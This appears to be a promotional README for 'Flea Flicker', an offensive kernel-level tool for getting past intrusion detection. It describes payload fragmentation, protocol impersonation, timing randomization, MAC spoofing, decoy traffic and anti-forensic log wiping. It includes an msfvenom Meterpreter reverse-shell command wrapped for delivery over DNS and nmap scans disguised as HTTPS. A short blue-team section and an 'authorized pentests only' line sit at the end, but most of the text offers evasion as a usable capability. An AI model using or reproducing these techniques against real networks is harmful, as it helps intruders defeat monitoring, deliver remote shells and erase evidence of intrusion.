Flea Flicker NetFilter

IDS blocks your scans. ML detects your payloads. Behavioral analysis flags your timing. Your pentest is over before it starts.

Flea Flicker manipulates packets at kernel level—before they hit the network, before IDS sees them. Netfilter hooks. Fragment payloads. Randomize timing. Impersonate protocols. Traffic looks legitimate. IDS sees nothing suspicious. Manual control over packet behavior. Not automated evasion. Not script kiddie tools.

What It Does

Deep Packet Inspection Evasion

IDS reads packet contents. Pattern matching catches exploits. Signature detection blocks payloads. Flea Flicker fragments your attack across multiple packets: encrypt at the application layer before the network layer, insert random padding between fragments, reassemble only at destination.

Normal Metasploit payload:
[TCP Header][Exploit Code]
↓ IDS sees exploit signature, blocks

Flea Flicker:
[TCP Header][Fragment 1 + Padding]
[TCP Header][Fragment 2 + Padding]
[TCP Header][Fragment 3 + Padding]
↓ IDS sees incomplete fragments, allows
↓ Target reassembles into exploit

Protocol Impersonation

Unusual protocols get flagged. Port scans detected immediately. Make attack traffic look like legitimate services.

Nmap scan on port 445:
→ SMB enumeration detected, blocked

Flea Flicker wrapped Nmap:
→ Packets look like HTTPS traffic on 443
→ Payload hidden in TLS-like structure
→ IDS sees "normal web browsing"
→ Scan proceeds undetected

Timing Randomization

Behavioral analysis detects patterns. Regular intervals mean automated scanning. You get caught. Flea Flicker randomizes delays between packets (0.1s to 5s), injects jitter to mimic human interaction, and throttles volume to stay under detection thresholds. This defeats time-series analysis, rate limiting, and correlation engines that break on temporal clustering.

MAC Address Rotation

Network access control, MAC filtering, device tracking—they know your hardware. Flea Flicker rotates MAC every N packets, spoofs the vendor OUI to look like different hardware, and maintains DHCP lease across rotations. Use case: bypass MAC filtering on WiFi networks during authorized pentest.

Traffic Mimicry

Volume analysis spots anomalies. Attack traffic does not look like normal users. Hide in normal traffic by generating decoy traffic alongside real attacks, matching volume patterns to office hours and usage spikes, and mixing protocols (HTTP, DNS, SMTP). The real attack disappears into noise that looks like a normal user.

Technical Implementation

// Intercept outbound packets
nf_register_hook(&nfho_out, PF_INET, NF_INET_POST_ROUTING,
                 packet_handler, NF_IP_PRI_FIRST);

// Modify before sending
unsigned int packet_handler(void *priv, struct sk_buff *skb, ...) {
    // Fragment payload
    // Add encryption layer
    // Inject timing delays
    // Spoof headers
    return NF_ACCEPT; // Send modified packet
}

[Application] → [Payload]
      ↓
[Flea Flicker Interceptor]
      ↓
[Fragment + Encrypt + Obfuscate + Time Delay]
      ↓
[Modified Packets] → [Network]

Real-World Scenario

Objective: enumerate SMB shares on a corporate network with IDS deployed.

Without Flea Flicker:

$ nmap -p 445 --script smb-enum-shares 10.0.0.0/24
→ IDS detects: Port scan + SMB enumeration
→ Alert triggered
→ IP blocked
→ Pentest detected

With Flea Flicker:

$ flea-flicker --mode ghost --protocol https \
  nmap -p 445 --script smb-enum-shares 10.0.0.0/24

→ Packets fragmented across 20-second window
→ Traffic appears as HTTPS on port 443
→ Timing randomized (looks like browsing)
→ IDS sees: Normal web traffic
→ Scan completes undetected
→ Pentest proceeds

Pentest Integration

Metasploit payload wrapping:

# Generate payload
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.0.0.1 LPORT=443 -f raw > payload.bin

# Wrap with Flea Flicker
flea-flicker --wrap payload.bin \
  --protocol dns --fragment-size 64 --delay 0.5-3.0

# Deliver wrapped payload
# Target receives fragments over DNS
# IDS sees legitimate DNS queries
# Payload reassembles and executes

Burp Suite extension:

[Burp Repeater]
     ↓
[Flea Flicker Proxy]
     ↓
[Obfuscated HTTP requests]
     ↓
[Target Web App]

WAF sees fragmented, time-delayed requests
Attack succeeds where direct request blocked

Nmap evasion:

# Standard aggressive scan (detected immediately)
nmap -A -T4 target.com

# Flea Flicker wrapped (evades detection)
flea-flicker --mode shadow --timing random \
  nmap -A -T2 target.com

Installation

git clone https://github.com/ghostintheprompt/flea-flicker-netfilter
cd flea-flicker-netfilter
sudo ./install.sh
sudo modprobe flea_flicker
flea-flicker --version

Requires Linux kernel 4.15+ with netfilter support, root access for kernel module loading, and Python 3.8+. Compatible with Kali, ParrotOS, Ubuntu, Debian.

Basic Usage

Ghost Mode (DPI evasion):

flea-flicker --mode ghost [command]
flea-flicker --mode ghost nmap -A target.com

Shadow Mode (MAC rotation + traffic mimicry):

flea-flicker --mode shadow --interface wlan0
# Continuous MAC rotation every 100 packets
# Generates decoy traffic automatically

Protocol Impersonation:

flea-flicker --protocol https nmap -p 445 target.com
flea-flicker --protocol dns [command]

Custom configuration:

flea-flicker --fragment-size 64 \
  --delay 0.5-3.0 \
  --protocol https \
  --mac-rotation 100 \
  [command]

Operational Security

Runs memory-only by default. No logs written, configuration in RAM, minimal disk artifacts.

flea-flicker --cleanup
flea-flicker --emergency-shutdown
flea-flicker --self-destruct 60 [command]

Anti-forensics: clears command history entries, wipes kernel module traces, removes temporary files, resets network state.

Why This Exists

Built this after a pentest where the client had deployed ML-based IDS. Standard Nmap was instant detection. Metasploit payloads got blocked immediately. Needed packet manipulation before IDS could analyze anything.

Netfilter hooks at kernel level intercept outbound traffic. Fragment payloads. Randomize timing. Impersonate protocols. IDS sees fragmented, delayed traffic that looks legitimate.

Works against commercial IDS/IPS, behavioral analysis, signature detection, and timing correlation. Does not work against deep SSL inspection with client certs, nation-state detection (they analyze everything), or air-gapped networks.

The technique is to understand how each detection method works and evade it systematically. DPI reads content—fragment it. Timing analysis looks for patterns—randomize them. Protocol detection flags unusual traffic—impersonate legitimate services. Behavioral analysis models normal users—generate decoy traffic that matches.

For Red Teams

This gets past commercial defenses. Test in lab first. Understand the evasion techniques. Do not rely on automation—manual control over packet behavior means you decide fragmentation size, timing delays, protocol impersonation. The tool provides capability. You provide intelligence.

For Blue Teams

Learn these techniques because attackers already use them. Update your signatures. Behavioral analysis alone is not enough—you need multi-layer detection: content, timing, volume, and protocol analysis combined.

If a red team can evade your IDS with open-source tools, real attackers already are.

---

Authorized pentests only. Written permission required. Federal prison is real.

github.com/ghostintheprompt/flea-flicker-netfilter

---

GhostInThePrompt.com // The factory is a bug. The battlefield is the crash report.